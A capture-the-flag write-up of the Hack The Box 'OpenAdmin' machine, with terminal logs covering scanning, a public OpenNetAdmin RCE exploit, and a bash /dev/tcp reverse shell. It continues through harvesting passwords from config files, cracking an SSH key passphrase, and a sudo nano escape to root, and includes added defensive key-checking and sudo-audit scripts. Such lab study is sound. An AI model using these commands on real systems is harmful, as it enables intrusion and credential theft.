HTB OpenAdmin done
OpenAdmin
Notes
Found 3 pages:
artwork
music
sierra
OS:
Linux
Technology:
OpenNetAdmin 18.1.1
IP Address:
10.129.200.221
Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Users and pass:
From: /opt/ona/www/config/auth_ldap.config.php
password: mysecretbindpassword
---
From /opt/ona/www/local/config/database_settings.inc.php
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
---
From file: /var/www/internal/index.php
pass: Revealed
---
From /opt/ona/www/local/config/database_settings.inc.php
L: jimmy
P: n1nj4W4rri0R!
---
Password for SSH key id_rsa - joanna
P: bloodninjas
---
SSH - joanna
L: joanna
P: bloodninjas
---
Nmap
┌──(.venv)─(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.203.219_nmap 10.129.203.219 ; cat 10.129.203.219_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 16:01 CET
Nmap scan report for 10.129.203.219
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
ffuf
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ ffuf -u http://10.129.4.30/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.4.30_ffuz -of all -e .php,.html,.txt,.bac,.backup
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.4.30/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : 10.129.4.30_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
artwork [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 51ms]
[INFO] Adding a new job to the queue: http://10.129.4.30/artwork/FUZZ
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 40ms]
music [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 42ms]
[INFO] Adding a new job to the queue: http://10.129.4.30/music/FUZZ
sierra [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 39ms]
[INFO] Adding a new job to the queue: http://10.129.4.30/sierra/FUZZ
[INFO] Starting queued job on target: http://10.129.4.30/artwork/FUZZ
about.html [Status: 200, Size: 11156, Words: 2960, Lines: 293, Duration: 56ms]
blog.html [Status: 200, Size: 11523, Words: 3338, Lines: 297, Duration: 32ms]
contact.html [Status: 200, Size: 8999, Words: 2524, Lines: 244, Duration: 41ms]
css [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 47ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/artwork/css/
fonts [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 33ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/artwork/fonts/
images [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 31ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/artwork/images/
index.html [Status: 200, Size: 14461, Words: 4026, Lines: 372, Duration: 46ms]
js [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 45ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/artwork/js/
main.html [Status: 200, Size: 931, Words: 69, Lines: 18, Duration: 51ms]
readme.txt [Status: 200, Size: 410, Words: 47, Lines: 9, Duration: 40ms]
services.html [Status: 200, Size: 11749, Words: 3197, Lines: 308, Duration: 31ms]
single.html [Status: 200, Size: 17627, Words: 5502, Lines: 368, Duration: 32ms]
[INFO] Starting queued job on target: http://10.129.4.30/music/FUZZ
artist.html [Status: 200, Size: 20133, Words: 877, Lines: 508, Duration: 52ms]
blog.html [Status: 200, Size: 6728, Words: 430, Lines: 174, Duration: 31ms]
category.html [Status: 200, Size: 23863, Words: 1020, Lines: 659, Duration: 44ms]
contact.html [Status: 200, Size: 6223, Words: 302, Lines: 178, Duration: 42ms]
css [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 41ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/music/css/
img [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 39ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/music/img/
index.html [Status: 200, Size: 12554, Words: 764, Lines: 356, Duration: 46ms]
js [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 68ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/music/js/
main.html [Status: 200, Size: 931, Words: 69, Lines: 18, Duration: 34ms]
playlist.html [Status: 200, Size: 8885, Words: 469, Lines: 272, Duration: 41ms]
[INFO] Starting queued job on target: http://10.129.4.30/sierra/FUZZ
about-us.html [Status: 200, Size: 20785, Words: 8310, Lines: 349, Duration: 37ms]
blog.html [Status: 200, Size: 20477, Words: 8481, Lines: 334, Duration: 39ms]
contact.html [Status: 200, Size: 15853, Words: 5469, Lines: 288, Duration: 41ms]
css [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 35ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/sierra/css/
elements.html [Status: 200, Size: 24524, Words: 10082, Lines: 426, Duration: 34ms]
fonts [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/sierra/fonts/
img [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 34ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/sierra/img/
index.html [Status: 200, Size: 43029, Words: 14866, Lines: 589, Duration: 58ms]
js [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 51ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/sierra/js/
portfolio.html [Status: 200, Size: 13000, Words: 4229, Lines: 230, Duration: 100ms]
service.html [Status: 200, Size: 22090, Words: 8827, Lines: 364, Duration: 39ms]
vendors [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 36ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.4.30/sierra/vendors/
:: Progress: [122814/122814] :: Job [4/4] :: 655 req/sec :: Duration: [0:02:35] :: Errors: 0 ::
Open website: http://10.129.4.30/music/
After clicking "Login" on the website I got redirected to http://10.129.4.30/ona
Open website: http://10.129.4.30/ona
I found info about software:
OpenNetAdmin
18.1.1
Find exploit
[OpenNetAdmin 18.1.1 - Remote Code Execution](https://github.com/amriunix/ona-rce)
Download exploit
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ git clone https://github.com/amriunix/ona-rce.git
Cloning into 'ona-rce'...
remote: Enumerating objects: 11, done.
remote: Counting objects: 100% (11/11), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 11 (delta 4), reused 9 (delta 2), pack-reused 0 (from 0)
Receiving objects: 100% (11/11), 552.45 KiB | 3.84 MiB/s, done.
Resolving deltas: 100% (4/4), done.
Run exploit
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_OpenAdmin/ona-rce]
└─$ python3 ona-rce.py check http://10.129.4.30/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] The remote host is vulnerable!
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_OpenAdmin/ona-rce]
└─$ python3 ona-rce.py exploit http://10.129.4.30/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$
Create a revshell
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_OpenAdmin/ona-rce]
└─$ python3 ona-rce.py exploit http://10.129.200.221/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ bash -c 'exec bash -i &>/dev/tcp/10.10.14.76/80 <&1'
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_OpenAdmin/ona-rce]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.76] from (UNKNOWN) [10.129.200.221] 46282
bash: cannot set terminal process group (1381): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$ python -c 'import pty; pty.spawn("/bin/bash")'
<www$ python -c 'import pty; pty.spawn("/bin/bash")'
Command 'python' not found, but can be installed with:
apt install python3
apt install python
apt install python-minimal
Ask your administrator to install one of them.
You also have python3 installed, you can run 'python3' instead.
www-data@openadmin:/opt/ona/www$ whereis python3
whereis python3
python3: /usr/bin/python3.6m /usr/bin/python3.6 /usr/bin/python3 /usr/lib/python3.7 /usr/lib/python3.8 /usr/lib/python3.6 /usr/lib/python3 /etc/python3.6 /etc/python3 /usr/local/lib/python3.6 /usr/share/python3 /usr/share/man/man1/python3.1.gz
www-data@openadmin:/opt/ona/www$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<ww$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@openadmin:/opt/ona/www$
Read config file: /opt/ona/www/config/auth_ldap.config.php
Find password: mysecretbindpassword
---
www-data@openadmin:/opt/ona/www/config$ cat auth_ldap.config.php
cat auth_ldap.config.php
<?php
/*
Uncomment and set the following to enable ldap auth settings for your environment
It is best to make a copy of this file and put it into the following path:
/opt/ona/www/local/config/auth_ldap.config.php
This file is for documentation purposes and will be overwritten during
upgrades of ONA. The ldap code was patterend from the DokuWiki auth
plugins. You can find documentation here that may be of use in
defining values below: http://www.dokuwiki.org/auth:ldap
*/
// Common settings and debugging
//$conf['auth']['ldap']['debug'] = 'true';
//$conf['auth']['ldap']['version'] = '3';
//$conf['auth']['ldap']['server'] = 'ldap://ldap.example.com:389';
// Active Directory DN bind as user example
//$conf['auth']['ldap']['binddn'] = '%{user}@example.local';
//$conf['auth']['ldap']['usertree'] = 'DC=example,DC=local';
//$conf['auth']['ldap']['userfilter'] = '(sAMAccountName=%{user})';
//$conf['auth']['ldap']['grouptree'] = 'DC=example,DC=local';
//$conf['auth']['ldap']['groupfilter'] = '(&(cn=*)(Member=%{dn})(objectClass=group))';
//$conf['auth']['ldap']['mapping']['grps'] = array('memberOf'=>'/cn=(.+?),/i');
//$conf['auth']['ldap']['referrals'] = '0';
// Novell E-Directory, anonymous bind example
//$conf['auth']['ldap']['usertree'] = 'cn=%{user},ou=users,ou=example,o=com';
//$conf['auth']['ldap']['mapping']['grps'] = array('groupmembership'=>'/cn=(.+?),/i');
//$conf['auth']['ldap']['userfilter'] = '(&(!(loginDisabled=TRUE)))';
//OpenLDAP with superuser bind
//$conf['auth']['ldap']['binddn'] = 'cn=Manager,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['bindpw'] = 'mysecretbindpassword';
//$conf['auth']['ldap']['usertree'] = 'cn=%{user},ou=People,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['grouptree'] = 'ou=Group,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['groupfilter'] = '(&(objectClass=posixGroup)(|(memberUid=%{dn})(memberUid=%{user})))';
www-data@openadmin:/opt/ona/www/config$
Read config: /opt/ona/www/local/config/database_settings.inc.php
Find creds to database:
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
---
www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
cat database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
Login as user: jimmy
L: jimmy
P: n1nj4W4rri0R!
---
www-data@openadmin:/home$ su jimmy
www-data@openadmin:/home$ su jimmy
su jimmy
Password: n1nj4W4rri0R!
jimmy@openadmin:/home$ ls -a
ls -a
. .. jimmy joanna
jimmy@openadmin:/home$ cd ~
cd ~
jimmy@openadmin:~$ ls -a
ls -a
. .. .bash_history .bash_logout .bashrc .cache .gnupg .local .profile
Found two interesting files (info about a hash and id_rsa)
jimmy@openadmin:~$ id
id
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
jimmy@openadmin:~$
jimmy@openadmin:~$ find / -group internal 2>/dev/null
find / -group internal 2>/dev/null
/var/www/internal
/var/www/internal/main.php
/var/www/internal/logout.php
/var/www/internal/index.php
jimmy@openadmin:~$
---
file: /var/www/internal/index.php
___
...
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
<?php
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
$_SESSION['username'] = 'jimmy';
header("Location: /main.php");
} else {
$msg = 'Wrong username or password.';
}
}
?>
...
---
file: /var/www/internal/main.php
___
jimmy@openadmin:/var/www/internal$ cat main.php
cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Crack hash
hash:
00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
pass: Revealed
Read apache config: /etc/apache2/sites-available/internal.conf
www-data@openadmin:/etc/apache2$ cat sites-available/internal.conf
cat sites-available/internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
www-data@openadmin:/etc/apache2$ ss -tulpn | grep 52846
ss -tulpn | grep 52846
tcp LISTEN 0 128 127.0.0.1:52846 0.0.0.0:*
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_OpenAdmin/ona-rce]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.92] from (UNKNOWN) [10.129.203.219] 50536
bash: cannot set terminal process group (1366): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$
www-data@openadmin:/opt/ona/www$ ss -tulpn
ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:52846 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 128 *:80 *:*
Create SSH tunnel
L: jimmy
P: n1nj4W4rri0R!
---
┌──(.venv)─(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ ssh jimmy@10.129.203.219 -L 52846:localhost:52846
The authenticity of host '10.129.203.219 (10.129.203.219)' can't be established.
ED25519 key fingerprint is SHA256:wrS/uECrHJqacx68XwnuvI9W+bbKl+rKdSh799gacqo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.203.219' (ED25519) to the list of known hosts.
jimmy@10.129.203.219's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Mar 20 19:46:42 UTC 2025
System load: 0.0 Processes: 169
Usage of /: 30.8% of 7.81GB Users logged in: 0
Memory usage: 9% IP address for ens160: 10.129.203.219
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
39 packages can be updated.
11 updates are security updates.
Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$
Login to local website
L: jimmy
P: Revealed
---
http://localhost:52846/
Read SSH key for user joanna
http://localhost:52846/main.php
---
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
...
-----END RSA PRIVATE KEY-----
Don't forget your "ninja" password
Click here to logout Session
Cracking SSH key (id_rsa) for user joanna
Password for id_rsa: bloodninjas
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ ssh2john id_rsa_joanna > id_rsa_joanna.hash
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_joanna.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa_joanna)
1g 0:00:00:02 DONE (2025-03-20 21:52) 0.3344g/s 3202Kp/s 3202Kc/s 3202KC/s bloodofyouth..bloodmore23
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ chmod 0700 id_rsa_joanna
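Why the passphrase fell in two seconds: the `Proc-Type: 4,ENCRYPTED` / `DEK-Info` header marks the legacy PEM format, which John reports as KDF 0 (MD5/AES) with iteration count 1. The checker below is an added example, not part of the original notes; it classifies a private key file by how its passphrase is protected, so weakly protected keys can be found and re-encrypted. The function names and both sample keys are assumptions of this example (the legacy sample reuses the header lines shown above with a constructed body).

```python
import base64
import re
import struct

MAGIC = b"openssh-key-v1\x00"

def ssh_string(data):
    """Encode bytes as an SSH wire string: uint32 length, then the bytes."""
    return struct.pack(">I", len(data)) + data

def read_string(buf, off):
    """Decode one SSH wire string at offset off; return (bytes, next offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def classify_private_key(pem_text):
    """Report how a private key file is passphrase-protected."""
    m = re.search(r"-----BEGIN ([A-Z0-9 ]+)-----(.*?)-----END \1-----", pem_text, re.S)
    if not m:
        raise ValueError("no PEM block found")
    label, body = m.group(1), m.group(2)

    if label == "OPENSSH PRIVATE KEY":
        blob = base64.b64decode("".join(body.split()))
        if not blob.startswith(MAGIC):
            raise ValueError("missing openssh-key-v1 magic")
        cipher, off = read_string(blob, len(MAGIC))
        kdf, off = read_string(blob, off)
        kdfopts, off = read_string(blob, off)
        if cipher == b"none":
            return {"format": "openssh-v1", "encrypted": False}
        rounds = None
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, pos = read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, pos)
        return {"format": "openssh-v1", "encrypted": True, "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds, "weak_kdf": False}

    headers = dict(re.findall(r"^([A-Za-z-]+): (.+)$", body, re.M))
    if "ENCRYPTED" in headers.get("Proc-Type", ""):
        # Legacy PEM encryption: the key is one MD5 pass over passphrase + salt.
        return {"format": "legacy-pem", "encrypted": True,
                "cipher": headers.get("DEK-Info", "").split(",")[0],
                "kdf": "md5", "rounds": 1, "weak_kdf": True}
    return {"format": "legacy-pem", "encrypted": False}

# Header lines as shown in the notes; the base64 body is a constructed placeholder.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

Q09OU1RSVUNURUQgUExBQ0VIT0xERVI=
-----END RSA PRIVATE KEY-----
"""

# Constructed header-only blob (no key material): aes256-ctr, bcrypt, 16 rounds.
HEADER = MAGIC + ssh_string(b"aes256-ctr") + ssh_string(b"bcrypt") \
    + ssh_string(ssh_string(bytes(16)) + struct.pack(">I", 16))
OPENSSH_SAMPLE = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                  + base64.b64encode(HEADER).decode()
                  + "\n-----END OPENSSH PRIVATE KEY-----\n")

if __name__ == "__main__":
    print(classify_private_key(LEGACY_SAMPLE), classify_private_key(OPENSSH_SAMPLE), sep="\n")
```

A key flagged `weak_kdf` can be rewritten in the bcrypt-protected OpenSSH format with `ssh-keygen -p -f <keyfile>` on a current OpenSSH; the stronger KDF only slows guessing, so a dictionary-word passphrase still needs replacing.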
Read flag: user.txt
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_OpenAdmin]
└─$ ssh joanna@10.129.203.219 -i id_rsa_joanna
Enter passphrase for key 'id_rsa_joanna':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Mar 20 20:57:06 UTC 2025
System load: 0.11 Processes: 175
Usage of /: 30.9% of 7.81GB Users logged in: 1
Memory usage: 9% IP address for ens160: 10.129.203.219
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
39 packages can be updated.
11 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Mar 20 20:56:42 2025 from 10.10.14.92
joanna@openadmin:~$ cd ~
joanna@openadmin:~$ ls -al
total 36
drwxr-x--- 5 joanna joanna 4096 Jul 27 2021 .
drwxr-xr-x 4 root root 4096 Nov 22 2019 ..
lrwxrwxrwx 1 joanna joanna 9 Nov 22 2019 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna 220 Nov 22 2019 .bash_logout
-rw-r--r-- 1 joanna joanna 3771 Nov 22 2019 .bashrc
drwx------ 2 joanna joanna 4096 Jul 27 2021 .cache
drwx------ 3 joanna joanna 4096 Nov 22 2019 .gnupg
-rw-r--r-- 1 joanna joanna 807 Nov 22 2019 .profile
drwx------ 2 joanna joanna 4096 Nov 23 2019 .ssh
-r-------- 1 joanna joanna 33 Mar 20 15:01 user.txt
joanna@openadmin:~$
joanna@openadmin:~$ cat user.txt
6a50a40601205c00c62eb74f75f87787
joanna@openadmin:~$
Privilege Escalation
sudo -l
joanna@openadmin:/home$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
joanna@openadmin:/home$
joanna@openadmin:/home$ file /opt/priv
/opt/priv: empty
joanna@openadmin:/home$ ls -la /opt/priv
-rw-r--r-- 1 root root 0 Nov 22 2019 /opt/priv
GTFOBins - nano
https://gtfobins.github.io/gtfobins/nano/#sudo
---
sudo nano
^R^X
reset; sh 1>&0 2>&0
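The root cause here is the sudoers rule itself: pinning nano to one file does not confine what the editor can do once it runs as root. The audit below is an added example, not part of the original notes; it parses `sudo -l` output and flags rules that grant an interactive, escape-capable program, suggesting `sudoedit` where the rule is an editor pinned to a single file. The program list, the function name and the last two sample rules are assumptions of this example.

```python
import os
import re

# Illustrative, non-exhaustive list (an assumption of this example): interactive
# programs that can run commands or open other files from inside their own UI.
ESCAPE_CAPABLE = {"nano", "vi", "vim", "ed", "emacs", "less", "more", "man"}
EDITORS = {"nano", "vi", "vim", "ed", "emacs"}

# One rule line of `sudo -l` output: "(runas) TAG: TAG: cmd, cmd"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_listing(listing):
    """Return one finding per sudo rule that grants an escape-capable program."""
    findings = []
    for line in listing.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        # Commas inside arguments are escaped as "\," in sudo's listing.
        for cmd in re.split(r"(?<!\\),\s*", m["cmds"].strip()):
            argv = cmd.split()
            if not argv:
                continue
            binary = os.path.basename(argv[0])
            if binary not in ESCAPE_CAPABLE:
                continue
            # An editor pinned to one file is the case sudoedit was built for:
            # the editor then runs as the invoking user on a temporary copy.
            suggest = f"sudoedit {argv[1]}" if binary in EDITORS and len(argv) == 2 else None
            findings.append({"runas": m["runas"], "nopasswd": "NOPASSWD" in tags,
                             "command": cmd, "binary": binary, "suggest": suggest})
    return findings

# First two lines are from the notes above; the last two rules are constructed.
SAMPLE_LISTING = """\
User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) sudoedit /opt/priv
    (root) NOPASSWD: /usr/sbin/apachectl configtest, /usr/bin/less /var/log/syslog
"""

if __name__ == "__main__":
    for finding in audit_sudo_listing(SAMPLE_LISTING):
        print(finding)
```

In sudoers the suggested replacement would read `joanna ALL = (root) sudoedit /opt/priv`.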
Read flag: root.txt
cd /root M-F New Buffer
ls -la
total 36
drwx------ 6 root root 4096 Mar 20 15:01 .
drwxr-xr-x 24 root root 4096 Aug 17 2021 ..
lrwxrwxrwx 1 root root 9 Nov 21 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Aug 17 2021 .cache
drwx------ 3 root root 4096 Nov 21 2019 .gnupg
drwxr-xr-x 3 root root 4096 Aug 17 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Mar 20 15:01 root.txt
drwx------ 2 root root 4096 Nov 21 2019 .ssh
cat root.txt
c3c33eca21a5ce3e817a197f76469029
References
[OpenNetAdmin 18.1.1 - Remote Code Execution](https://github.com/amriunix/ona-rce)
[GTFOBins - nano](https://gtfobins.github.io/gtfobins/nano/#sudo)
Lessons Learned